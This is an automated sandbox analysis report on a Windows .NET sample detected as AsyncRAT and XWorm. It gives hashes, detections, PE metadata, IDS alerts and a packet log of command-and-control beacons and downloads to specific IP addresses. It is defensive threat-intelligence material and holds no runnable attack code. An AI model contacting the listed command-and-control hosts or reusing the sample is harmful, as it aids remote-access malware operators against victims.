SHA-512:	04AECE7190C9731D3A3528EF4B762EB47DB6B50F670201DAD4CD98C8BDF389EB1C8671488B550B02B28AE8AE61685EF0929B0A05273F09114B0E45269E4514BF
Malicious:	true
Yara Hits:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\Windows Defender.exe, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\Windows Defender.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Windows Defender.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\Windows Defender.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...g+Ag................................. ........@.. ....................... ............@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........h...`............................................................(......(.....s.........s.........s.........s............0..........~....o.....+....0..........~....o.....+....0..........~....o.....+....0..........~....o.....+....0............(....(.....+......0...........(.....+....0...............(.....+....0...........(.....+....0................-.(...+.+.+...+...0...........................(.....0.. .......~.........-.(...+.....~.....+....(.....0..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.635895794683882
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	owuP726k3d.exe
File size:	46'080 bytes
MD5:	04f89f83ba27038601e2321b08d0b4ca
SHA1:	edecd6d74ac90bbd235334ee17c2cae0ababa51b
SHA256:	4d3101ba1ec70ddd04a30b6f04a67817920a6601e477339e5c135c167f6ab1e2
SHA512:	04aece7190c9731d3a3528ef4b762eb47db6b50f670201dad4cd98c8bdf389eb1c8671488b550b02b28ae8ae61685ef0929b0a05273f09114b0e45269e4514bf
SSDEEP:	768:fvn+LJZ2ny8BcGhsWc3cQHqGbgEbFEP89ObA6BOuh3zjjU:fHABTMmq6FN9UA6BOuFE
TLSH:	32234B483BD44625C6FFABF9197272060675F5134D13E69E0CD88AAB2B37B818E107D7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...g+Ag................................. ........@.. ....................... ............@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x40c9ce
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67412B67 [Sat Nov 23 01:09:59 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc978	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xe000	0x4d8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x10000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xa9d4	0xaa00	82c01e6995ba9d5bda4afaf8fcd45b4d	False	0.48901654411764706	data	5.74390235838111	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xe000	0x4d8	0x600	eb98485d221a9dac7f4c898bdd49f67f	False	0.375	data	3.7090599703294544	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x10000	0xc	0x200	e67d52f68ef222ee64770a3f6b1bd8a0	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xe0a0	0x244	data			0.4706896551724138
RT_MANIFEST	0xe2e8	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-23T21:09:24.374656+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49715	172.67.75.40	443	TCP
2024-11-23T21:09:28.238462+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49726	172.67.75.40	443	TCP
2024-11-23T21:09:31.181886+0100	2855924	ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound	1	192.168.2.8	49712	147.185.221.19	2030	TCP
2024-11-23T21:09:32.033328+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49732	172.67.75.40	443	TCP
2024-11-23T21:09:35.771707+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49743	172.67.75.40	443	TCP
2024-11-23T21:09:39.784498+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49754	172.67.75.40	443	TCP
2024-11-23T21:09:47.639706+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49772	172.67.75.40	443	TCP
2024-11-23T21:09:51.453116+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49783	172.67.75.40	443	TCP
2024-11-23T21:09:55.270576+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49789	172.67.75.40	443	TCP
2024-11-23T21:09:59.007877+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49800	172.67.75.40	443	TCP
2024-11-23T21:10:02.867510+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49811	172.67.75.40	443	TCP
2024-11-23T21:10:06.735068+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49817	172.67.75.40	443	TCP
2024-11-23T21:10:10.758293+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49829	172.67.75.40	443	TCP
2024-11-23T21:10:15.739621+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49839	172.67.75.40	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 23, 2024 21:08:13.701061964 CET	49704	80	192.168.2.8	208.95.112.1
Nov 23, 2024 21:08:13.837620020 CET	80	49704	208.95.112.1	192.168.2.8
Nov 23, 2024 21:08:13.837888002 CET	49704	80	192.168.2.8	208.95.112.1
Nov 23, 2024 21:08:13.842112064 CET	49704	80	192.168.2.8	208.95.112.1
Nov 23, 2024 21:08:14.123187065 CET	80	49704	208.95.112.1	192.168.2.8
Nov 23, 2024 21:08:15.098912001 CET	80	49704	208.95.112.1	192.168.2.8
Nov 23, 2024 21:08:15.147521973 CET	49704	80	192.168.2.8	208.95.112.1
Nov 23, 2024 21:09:18.403422117 CET	49712	2030	192.168.2.8	147.185.221.19
Nov 23, 2024 21:09:18.526093960 CET	2030	49712	147.185.221.19	192.168.2.8
Nov 23, 2024 21:09:18.529130936 CET	49712	2030	192.168.2.8	147.185.221.19
Nov 23, 2024 21:09:18.703394890 CET	49712	2030	192.168.2.8	147.185.221.19
Nov 23, 2024 21:09:18.753534079 CET	49713	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:18.753565073 CET	443	49713	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:18.753637075 CET	49713	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:18.763525963 CET	49713	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:18.763552904 CET	443	49713	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:18.844676971 CET	2030	49712	147.185.221.19	192.168.2.8
Nov 23, 2024 21:09:20.094371080 CET	443	49713	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:20.094522953 CET	49713	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:20.096829891 CET	49713	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:20.096836090 CET	443	49713	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:20.097084045 CET	443	49713	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:20.147875071 CET	49713	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:20.153326988 CET	49713	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:20.195369959 CET	443	49713	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:20.597975016 CET	443	49713	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:20.598063946 CET	443	49713	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:20.598102093 CET	443	49713	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:20.598129034 CET	49713	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:20.598140955 CET	443	49713	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:20.598190069 CET	443	49713	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:20.598196983 CET	49713	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:20.598206043 CET	443	49713	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:20.598263025 CET	49713	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:20.598275900 CET	443	49713	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:20.609205008 CET	443	49713	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:20.609292030 CET	443	49713	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:20.609369993 CET	49713	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:20.613478899 CET	49713	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:22.632342100 CET	49704	80	192.168.2.8	208.95.112.1
Nov 23, 2024 21:09:22.632941961 CET	49715	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:22.633002043 CET	443	49715	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:22.633147001 CET	49715	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:22.633387089 CET	49715	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:22.633418083 CET	443	49715	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:22.752513885 CET	80	49704	208.95.112.1	192.168.2.8
Nov 23, 2024 21:09:22.752583027 CET	49704	80	192.168.2.8	208.95.112.1
Nov 23, 2024 21:09:23.911916018 CET	443	49715	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:23.916078091 CET	49715	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:23.916106939 CET	443	49715	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:24.374666929 CET	443	49715	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:24.374777079 CET	443	49715	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:24.374816895 CET	443	49715	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:24.374845982 CET	443	49715	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:24.374875069 CET	443	49715	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:24.374907017 CET	49715	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:24.374907017 CET	49715	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:24.374910116 CET	443	49715	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:24.374924898 CET	443	49715	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:24.375351906 CET	49715	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:24.386338949 CET	443	49715	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:24.386401892 CET	443	49715	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:24.386495113 CET	49715	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:24.387118101 CET	49715	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:26.398159027 CET	49726	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:26.398199081 CET	443	49726	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:26.398263931 CET	49726	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:26.398555040 CET	49726	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:26.398567915 CET	443	49726	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:27.762139082 CET	443	49726	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:27.770526886 CET	49726	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:27.770555973 CET	443	49726	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:28.238498926 CET	443	49726	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:28.238586903 CET	443	49726	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:28.238631010 CET	443	49726	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:28.238631010 CET	49726	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:28.238667965 CET	443	49726	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:28.238724947 CET	443	49726	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:28.238729000 CET	49726	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:28.238742113 CET	443	49726	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:28.238786936 CET	49726	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:28.246742010 CET	443	49726	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:28.255131960 CET	443	49726	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:28.255182028 CET	49726	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:28.255196095 CET	443	49726	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:28.255212069 CET	443	49726	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:28.255261898 CET	49726	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:28.255708933 CET	49726	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:30.258311033 CET	49732	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:30.258421898 CET	443	49732	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:30.258495092 CET	49732	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:30.258821011 CET	49732	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:30.258862972 CET	443	49732	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:31.181885958 CET	49712	2030	192.168.2.8	147.185.221.19
Nov 23, 2024 21:09:31.301377058 CET	2030	49712	147.185.221.19	192.168.2.8
Nov 23, 2024 21:09:31.572278976 CET	443	49732	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:31.573657036 CET	49732	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:31.573699951 CET	443	49732	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:32.033322096 CET	443	49732	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:32.033426046 CET	443	49732	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:32.033452988 CET	443	49732	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:32.033480883 CET	443	49732	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:32.033528090 CET	443	49732	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:32.033557892 CET	443	49732	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:32.033560038 CET	49732	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:32.033615112 CET	443	49732	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:32.033647060 CET	49732	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:32.033647060 CET	49732	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:32.042370081 CET	443	49732	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:32.042448044 CET	443	49732	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:32.042532921 CET	49732	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:32.042932034 CET	49732	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:34.054629087 CET	49743	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:34.054681063 CET	443	49743	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:34.054835081 CET	49743	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:34.055190086 CET	49743	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:34.055206060 CET	443	49743	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:35.318340063 CET	443	49743	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:35.319437981 CET	49743	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:35.319462061 CET	443	49743	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:35.771717072 CET	443	49743	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:35.771800995 CET	443	49743	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:35.771836042 CET	443	49743	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:35.771845102 CET	49743	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:35.771861076 CET	443	49743	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:35.771898031 CET	49743	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:35.771902084 CET	443	49743	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:35.771913052 CET	443	49743	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:35.771955013 CET	49743	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:35.771960020 CET	443	49743	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:35.780255079 CET	443	49743	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:35.780303001 CET	49743	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:35.780308008 CET	443	49743	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:35.780319929 CET	443	49743	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:35.780369043 CET	49743	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:35.780765057 CET	49743	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:38.007093906 CET	49754	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:38.007148981 CET	443	49754	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:38.007230997 CET	49754	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:38.040991068 CET	49754	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:38.041032076 CET	443	49754	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:39.316632986 CET	443	49754	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:39.320724010 CET	49754	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:39.320768118 CET	443	49754	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:39.784554958 CET	443	49754	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:39.784790039 CET	443	49754	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:39.784881115 CET	443	49754	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:39.785026073 CET	443	49754	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:39.785036087 CET	49754	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:39.785068989 CET	443	49754	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:39.785089970 CET	49754	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:39.793190956 CET	443	49754	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:39.794959068 CET	49754	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:39.794980049 CET	443	49754	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:39.802006960 CET	443	49754	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:39.802069902 CET	443	49754	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:39.802155972 CET	49754	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:39.803402901 CET	49754	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:40.489965916 CET	2030	49712	147.185.221.19	192.168.2.8
Nov 23, 2024 21:09:40.490143061 CET	49712	2030	192.168.2.8	147.185.221.19
Nov 23, 2024 21:09:41.491625071 CET	49712	2030	192.168.2.8	147.185.221.19
Nov 23, 2024 21:09:41.495296955 CET	49760	2030	192.168.2.8	147.185.221.19
Nov 23, 2024 21:09:41.804111004 CET	49712	2030	192.168.2.8	147.185.221.19
Nov 23, 2024 21:09:41.808077097 CET	49761	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:41.808136940 CET	443	49761	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:41.808212042 CET	49761	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:41.808501005 CET	49761	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:41.808518887 CET	443	49761	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:42.015057087 CET	2030	49712	147.185.221.19	192.168.2.8
Nov 23, 2024 21:09:42.015079021 CET	2030	49760	147.185.221.19	192.168.2.8
Nov 23, 2024 21:09:42.015213013 CET	49760	2030	192.168.2.8	147.185.221.19
Nov 23, 2024 21:09:42.016041040 CET	2030	49712	147.185.221.19	192.168.2.8
Nov 23, 2024 21:09:42.016103983 CET	49712	2030	192.168.2.8	147.185.221.19
Nov 23, 2024 21:09:42.066946030 CET	49760	2030	192.168.2.8	147.185.221.19
Nov 23, 2024 21:09:42.247494936 CET	2030	49760	147.185.221.19	192.168.2.8
Nov 23, 2024 21:09:43.272144079 CET	443	49761	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:43.309273005 CET	49761	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:43.309308052 CET	443	49761	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:43.728612900 CET	443	49761	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:43.728699923 CET	443	49761	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:43.728737116 CET	443	49761	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:43.728770971 CET	443	49761	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:43.728807926 CET	49761	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:43.728811026 CET	443	49761	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:43.728849888 CET	443	49761	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:43.728868008 CET	49761	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:43.728889942 CET	49761	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:43.744793892 CET	443	49761	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:43.760809898 CET	443	49761	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:43.760858059 CET	49761	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:43.760867119 CET	443	49761	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:43.761018038 CET	49761	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:43.761301994 CET	49761	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:45.774445057 CET	49772	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:45.774496078 CET	443	49772	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:45.774561882 CET	49772	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:45.774796009 CET	49772	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:45.774808884 CET	443	49772	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:47.176691055 CET	443	49772	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:47.178102016 CET	49772	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:47.178114891 CET	443	49772	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:47.639707088 CET	443	49772	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:47.639791965 CET	443	49772	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:47.639822960 CET	443	49772	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:47.639851093 CET	443	49772	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:47.639861107 CET	49772	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:47.639888048 CET	443	49772	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:47.639904976 CET	49772	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:47.639928102 CET	443	49772	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:47.639965057 CET	49772	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:47.639971972 CET	443	49772	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:47.652834892 CET	443	49772	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:47.652905941 CET	443	49772	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:47.652904034 CET	49772	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:47.652949095 CET	49772	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:47.653316021 CET	49772	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:49.664154053 CET	49783	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:49.664184093 CET	443	49783	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:49.664241076 CET	49783	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:49.664524078 CET	49783	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:49.664534092 CET	443	49783	172.67.75.40	192.168.2.8
